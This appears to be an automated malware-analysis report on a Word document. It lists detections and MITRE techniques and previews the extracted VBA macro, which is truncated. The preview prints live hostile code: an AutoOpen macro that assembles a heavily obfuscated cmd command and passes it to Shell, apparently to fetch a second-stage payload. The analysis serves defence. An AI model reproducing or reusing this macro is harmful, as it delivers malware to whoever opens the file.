MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell function, which is a critical indicator of malicious activity, likely to download and execute a second-stage payload. The specific command constructed within the Shell function is highly obfuscated, preventing a precise reconstruction of the executed command or URL, but the intent to execute arbitrary code is clear.
Heuristics 6
-
ClamAV: Doc.Malware.Powload-6691557-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6691557-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16777 bytes |
SHA-256: 9f3491858116b14fb2b15ad1c7b4452b1b3592ee95dcb8ef140b4da676196592 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "sKtmqDsoHSVl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName 6
TypeName 8917
TypeName 375
TypeName CCur(niSOQp)
TypeName Sin(78661 * icJmG)
Shell# KeyString(MmVwuYlj + PzMiRjJzDr + vbKeyC + FzPowDZniQNYb + jSQNNapIO) + UzisKFdXjXjFb + RpzmoHbR + BFDzi + sFFzRMilinz + RSWtmhL + AjbRSlNILW + BJMRbcBsdwL + KVDOubbWJ + iriaGT + JQcsUqVPDZD + jKFBUUbKqO + MwiMnaRj + HuCpwqkcU + jWSEJHXz + JrAMofE + JcKitfBMXbLJPh, 764019835 - 764019835
TypeName Month(ERacTw - OFRjYd / 47825 - wIajjj)
TypeName VzhIC
TypeName Rnd(984)
End Sub
Attribute VB_Name = "JVvTjWBwQzQdbF"
Function BFDzi()
On Error Resume Next
TypeName CDate(jfODi)
TypeName 780
IIILsHVzjdW = "m" + "d" + " /" + "V:" + "O"
TypeName kqUjUP
TypeName Fix(hPopzY / cjCaZd)
zwiwGlzi = "N " + " " + " /" + CStr(Chr(zcddWXCYkhp + zprUkZBKM + 67 + awoQohuUPrcKWo + qjozTuJOJd)) + " " + " " + " " + CStr(Chr(UnSmciDaimk + VIYViUjzFLbX + 34 + fnaGKsQzcZq + kKlEwmKwmktfI)) + " " + " s" + "et" + " " + " A"
TypeName Str(64377 - CijfV + wWRLq * XwZNwM)
TypeName iGVav
TypeName 106121698
cqoRLoPPzD = "V1=" + "KfI" + "i" + CStr(Chr(PbqOZwYmIfZ + VfzfvbvpUH + 99 + rhtChbCjmkAi + uMXcYZcp)) + "W" + "mFt" + "FR" + "mw" + "MvP" + "H" + "nV" + "p1"
TypeName NZYnS
TypeName Sqr(JLOrS)
TypeName 7
pwWkSwTPTiE = CStr(Chr(lOjhNou + diQikbEXb + 67 + fQDmhiRriCJC + QSrUVzpfTwadh)) + "rJ" + "k" + "he;" + "U)" + "/s:"
TypeName CStr(rMEBL)
TypeName (SwsUcL)
tYAiXQUPR = "o" + "7" + "y" + "u" + "Y"
TypeName Tan(7040)
TypeName 957
pGUkXwji = "@4" + "zd" + "S" + "2A" + "x" + "-" + "+Z" + "=bN" + "j" + "8}D"
TypeName CDbl(36)
TypeName 8595500
TypeName SzFjsE
MLoXbJ = "(\" + "'" + "." + CStr(Chr(UCAFrbV + zfWDmMTfMrTIMC + 108 + vzzFMEAiqOAI + LvIuVqam)) + "{E$" + " " + ","
TypeName TypeName(620)
TypeName 817
LGVqzZf = "ag&" + "& " + " f" + "or" + " %k" + " " + " in"
TypeName Sgn(SjijrF + bFqZzE / EkBoNd / 52010)
TypeName CLng(8)
TypeName 2487
hpCvHMui = " " + " " + "( 1" + "9 " + "3" + "3 " + " " + " " + "12" + " 26" + " " + "2" + "2"
TypeName 4
TypeName CCur(CpSisV)
TypeName CCur(13376 * 88254)
RakKnSi = " 3" + "1" + " " + "25" + " " + " "
BFDzi = IIILsHVzjdW + zwiwGlzi + cqoRLoPPzD + pwWkSwTPTiE + tYAiXQUPR + pGUkXwji + MLoXbJ + LGVqzZf + hpCvHMui + RakKnSi
TypeName 40
TypeName 273350357
TypeName TypeName(WKNGfi)
End Function
Function sFFzRMilinz()
On Error Resume Next
TypeName kFpYS
TypeName TimeValue(bMiwnd)
aZJQjLjbE = " " + " 2" + "6" + " 6" + "0 " + " " + "60" + " 64" + " " + " 6" + "3 "
TypeName WFjsYc
TypeName CStr(5)
fljJHwCiUcr = " " + "5 " + " " + "50 " + " " + " " + " 4" + "0 " + " " + "49 "
TypeName Tan(1)
TypeName Chr(3)
bQvJqdKu = "1" + "7 " + " " + "26" + " " + " 1" + "2 " + " " + "46" + " 33" + " "
TypeName 323977597
TypeName LCase(53067 + VzMhwz / tQJfQ - 31853)
BCiMiAURS = "5" + "0 " + "5" + "2" + " " + " 2"
TypeName jlGvDb
TypeName CLng(139999472)
TypeName Int(oSwDRC / YMcaQC + 23521 + zYNzb)
dqUkYMwhYhH = "6" + " " + " 4 " + " " + " 8"
TypeName 50
TypeName TypeName(YihUf)
vmWjlbvjF = " " + "64 " + " 5" + "1 " + " 26" + " " + "8 " + "59 " + "5 " + " 2" + "6"
TypeName 6
TypeName 8071
pcXUQWb = " " + "50 " + " " + " " + " 2" + "1 " + " " + " " + "60" + " 3" + " 2" + "6 " + "17"
sFFzRMilinz = aZJQjLjbE + fljJHwCiUcr + bQvJqdKu + BCiMiAURS + dqUkYMwhYhH + vmWjlbvjF + pcXUQWb
TypeName 53
TypeName 1592
End Function
Function RSWtmhL()
On Error Resume Next
TypeName CInt(6)
TypeName Log(zdQsQ)
wzwEhviRYCz = " " + "8" + " 2" + "7 " + "63 "
TypeName CSng(3)
TypeName 9725
TypeName Sqr(cNRLG)
BXWJERk = "4" + "0 " + " " + "62 " + "41" + " 4" + "9" + " 5" + "8" + " 25" + " 8"
TypeName TiiUmJ
TypeName CDa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.